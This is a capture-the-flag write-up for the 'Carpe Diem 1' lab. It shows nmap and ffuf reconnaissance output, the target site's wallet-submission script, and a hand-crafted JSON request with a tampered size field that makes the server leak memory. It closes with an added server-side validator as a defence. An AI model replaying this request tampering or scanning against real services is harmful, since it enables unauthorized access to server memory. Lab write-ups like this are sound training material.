Carpe Diem 1
Recover your client's encrypted files before the ransomware timer runs out!
Topics
- Network Enumeration
- Web Poking
- Web Enumeration
- Cross Site XMLHttpRequest
- Enumeration (GraphQL)
- Brute Forcing (KDBX KeePass)
Appendix archive
Password: 1 kn0w 1 5h0uldn'7!
Task 1 Pay...back!
One of your clients has been hacked by the Carpe Diem cyber gang and all their important files have been encrypted. They have hired you to help them recover an important file that they need to restore their backups. They have contacted the Carpe Diem cyber gang and paid a ransom but have not heard anything back.
The countdown timer has been ticking since they visited, and they are now running out of time to recover their data before the keys are deleted on the server. Can you retrieve the keys and help your client restore their data before time runs out?
The file is available to download on the machine: /downloads/Database.carp
(The downloads section is not part of the challenge)
kali@kali:~/CTFs/tryhackme/Carpe Diem 1$ sudo nmap -A -sS -sC -sV -O 10.10.99.101
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-22 17:46 CEST
Nmap scan report for 10.10.99.101
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Home
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44590/tcp status
| 100024 1 45539/udp status
| 100024 1 48106/udp6 status
|_ 100024 1 55537/tcp6 status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 33.52 ms 10.8.0.1
2 33.65 ms 10.10.99.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds
<script>
// Page script from the gang's site: submits a "proof" (a wallet address) to /proof/.
function aaa(wallet) {
    var wallet = wallet;
    // One hard-coded address is refused outright with a taunt.
    if (wallet.trim() === "bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hj") {
        alert("Hey! \n\nstupid is as stupid does...");
        return;
    }
    // Client-side check only: exactly 42 lowercase alphanumeric characters.
    var re = new RegExp("^([a-z0-9]{42,42})$");
    if (re.test(wallet.trim())) {
        // Cross-site XMLHttpRequest: POSTs {"size":42,"proof":"<wallet>"} as JSON
        // to c4rp3d13m.net. Note that the untrimmed value is what gets sent.
        var http = new XMLHttpRequest();
        var url = "http://c4rp3d13m.net/proof/";
        http.open("POST", url, true);
        http.setRequestHeader("Content-type", "application/json");
        var d = '{"size":42,"proof":"' + wallet + '"}';
        http.onreadystatechange = function () {
            if (http.readyState == 4 && http.status == 200) {
                //alert(http.responseText);   // the response body is never shown to the user
            }
        };
        http.send(d);
    } else {
        alert("Invalid wallet!");
    }
}
</script>
kali@kali:~/CTFs/tryhackme/Carpe Diem 1$ /opt/ffuf/ffuf -c -u http://10.10.99.101/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt
v1.2.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.99.101/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
images [Status: 301, Size: 179, Words: 7, Lines: 11]
downloads [Status: 301, Size: 185, Words: 7, Lines: 11]
javascripts [Status: 301, Size: 189, Words: 7, Lines: 11]
stylesheets [Status: 301, Size: 189, Words: 7, Lines: 11]
Downloads [Status: 200, Size: 483, Words: 18, Lines: 1]
http://c4rp3d13m.net/downloads/Database.carp
POST /proof/ HTTP/1.1
Host: c4rp3d13m.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://c4rp3d13m.net/
Content-type: application/json
Content-Length: 65
Connection: close
Cookie: session=MTAuOC4xMDYuMjIy; countdown=2020-10-22T15%3A46%3A27.560557
{"size":420,"proof":"bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hs"}
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 22 Oct 2020 16:23:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Last-Modified: Thursday, 22-Oct-2020 16:23:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Length: 982
bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hs[... the remainder of the 982-byte body is non-printable binary; the string "jade_interp" is visible among the bytes ...]
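From the defender's side, the captured request shows why the browser-side regex in the page script is not a control: the body is plain JSON, and here it was sent with "size":420 and a proof the client script would not have produced. The following is an added example, not the site's or the challenge's own code, of a server-side validator for the same {"size":N,"proof":"<wallet>"} body; the 256-byte body cap and the sample wallet strings are assumptions.

```javascript
// Added example: server-side re-validation of the /proof/ JSON body.
// It re-applies the client script's rule and never treats the client-supplied
// "size" as a length to read, copy or allocate.

const PROOF_RE = /^[a-z0-9]{42}$/;  // same rule as the page's client-side RegExp
const MAX_BODY_BYTES = 256;         // assumed cap; a legitimate body is 65 bytes

// Returns { ok: true, proof } or { ok: false, reason }.
function validateProof(rawBody) {
  if (typeof rawBody !== "string" || Buffer.byteLength(rawBody, "utf8") > MAX_BODY_BYTES) {
    return { ok: false, reason: "body too large" };
  }
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch (e) {
    return { ok: false, reason: "malformed JSON" };
  }
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { ok: false, reason: "body must be a JSON object" };
  }
  const { size, proof } = body;
  if (typeof proof !== "string" || !PROOF_RE.test(proof)) {
    return { ok: false, reason: "proof must be 42 lowercase alphanumerics" };
  }
  // "size" is redundant with proof.length; it must match exactly and is
  // only ever compared, never used to index a buffer.
  if (!Number.isInteger(size) || size !== proof.length) {
    return { ok: false, reason: "size does not match proof length" };
  }
  return { ok: true, proof };
}

// Constructed sample bodies. The first has the shape the page's client script
// builds (with a made-up 42-character address); the second mirrors the
// hand-crafted request captured on the page.
const SAMPLE_WALLET = "bc1q" + "exampleconstructed" + "0".repeat(20);
const LEGIT_BODY = JSON.stringify({ size: 42, proof: SAMPLE_WALLET });
const TAMPERED_BODY = '{"size":420,"proof":"bc1q989cy4zp8x9xpxgwpznsxx44u0cxhyjjyp78hs"}';

console.log(validateProof(LEGIT_BODY));     // { ok: true, proof: 'bc1q...' }
console.log(validateProof(TAMPERED_BODY));  // { ok: false, reason: 'size does not match proof length' }
```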